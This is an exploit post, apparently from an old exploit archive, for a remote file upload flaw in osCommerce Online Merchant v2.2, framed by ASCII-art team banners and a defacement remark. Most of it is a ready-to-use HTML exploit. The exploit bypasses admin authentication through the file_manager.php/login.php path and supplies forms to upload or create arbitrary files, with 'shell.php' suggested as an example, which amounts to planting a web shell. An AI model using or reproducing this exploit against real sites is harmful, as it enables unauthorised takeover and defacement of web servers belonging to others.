54 lines
No EOL
2 KiB
Text
54 lines
No EOL
2 KiB
Text
______ _ _ _
|
|
| ___ \ | | | | (_)
|
|
| |_/ /_____ _____ | |_ _| |_ _ ___ _ __
|
|
| // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \
|
|
| |\ \ __/\ V / (_) | | |_| | |_| | (_) | | | |
|
|
\_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|
|
|
|
|
_____ _____ _____
|
|
|_ _| | _ || _ |
|
|
| | ___ __ _ _ __ ___ | |/' || |_| |
|
|
| |/ _ \/ _` | '_ ` _ \ | /| |\____ |
|
|
| | __/ (_| | | | | | | \ |_/ /.___/ /
|
|
\_/\___|\__,_|_| |_| |_| \___/ \____/
|
|
|
|
DEFACEMENT it's for script kiddies...
|
|
_____________________________________________________________
|
|
|
|
[$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload
|
|
[$] Date : 30-05-2010
|
|
[$] Author : MasterGipy
|
|
[$] Email : mastergipy [at] gmail.com
|
|
[$] Bug : Remote File Upload
|
|
[$] Vendor : http://www.oscommerce.com
|
|
[$] Google Dork : n/a
|
|
|
|
|
|
[%] vulnerable file: /admin/file_manager.php
|
|
|
|
[REMOTE FILE UPLOAD VULNERABILITY]
|
|
|
|
[$] Exploit:
|
|
|
|
<html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
|
|
<br><br><u>UPLOAD FILE:</u><br>
|
|
<form name="file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
|
|
<input type="file" name="file_1"><br>
|
|
<input name="submit" type="submit" value=" Upload " >
|
|
</form>
|
|
|
|
<br><u>CREATE FILE:</u><br>
|
|
<form name="new_file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post">
|
|
FILE NAME:<br>
|
|
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
|
|
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
|
|
<input name="submit" type="submit" value=" Save " >
|
|
</form>
|
|
</html>
|
|
|
|
|
|
|
|
[=] Thanks to Flyff666 for the original exploit:
|
|
- Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass
|
|
|
|
[§] Greetings from PORTUGAL ^^ |